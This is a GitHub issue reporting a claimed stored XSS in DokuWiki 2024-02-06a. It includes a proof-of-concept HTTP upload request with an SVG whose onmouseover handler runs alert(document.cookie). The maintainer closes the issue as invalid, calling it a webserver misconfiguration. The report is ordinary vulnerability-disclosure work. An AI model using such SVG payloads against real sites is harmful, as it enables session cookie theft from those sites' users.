Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

DokuWiki 2024-02-06a has a stored XSS vulnerability #4267

Closed
Hebing123 opened this issue Apr 16, 2024 · 1 comment
Closed

DokuWiki 2024-02-06a has a stored XSS vulnerability #4267

Hebing123 opened this issue Apr 16, 2024 · 1 comment
Labels
invalid Security

Comments

@Hebing123
Copy link

Hebing123 commented Apr 16, 2024
edited

Summary

DokuWiki 2024-02-06a has a storage XSS vulnerability, an attacker can upload a malicious svg file to obtain other users' cookies.

Details

We found that in the Media Manager, it is allowed to include svg in the file extension list. svg files can execute html code.
image
We posted a SVG file contains malicious code, and then click to view: http://192.168.160.154:1042/lib/exe/fetch.php?media=alert.svg
image
It doesn't seem to trigger the popup code. But we access URL at http://192.168.160.154:1042/data/media/alert.svg.We found that it successfully executed the code.We should not put the save address of the svg file in a place where the user can access. The fetch.php file used for html code filtering here looks funny.
image
Of course, it is important to note that not every svg file can be successfully uploaded, because I have noticed that when the svg file is uploaded, the server detects malicious code and prompts that the upload operation is blocked because of possible malicious content.

Proof of Concept (POC)

POST /lib/exe/ajax.php?tab_files=files&tab_details=view&do=media&ns=&sectok=&mediaid=&call=mediaupload&qqfile=alert.svg&ow=false HTTP/1.1
Host: your-ip
Content-Length: 195
X-Requested-With: XMLHttpRequest
X-File-Name: alert.svg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Content-Type: application/octet-stream
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <circle r="50" cx="50" cy="50" fill="red" 
            onmouseover="alert(document.cookie);" />
</svg>

Then visit http://your-ip/data/media/alert.svg can trigger.

Version of DokuWiki

DokuWiki 2024-02-06a "Kaos"

PHP Version

8.2
@Hebing123 Hebing123 added the Bug label Apr 16, 2024
@splitbrain
Copy link
Collaborator

Your data directory should never be directly accessible. This is a misconfiguration of your webserver and the admin interface should warn you about it. All access to media files has to go through the fetch.php dispatcher which will add a CSP header to prevent attacks like these (and will also check ACLs).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
invalid Security
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@splitbrain @Hebing123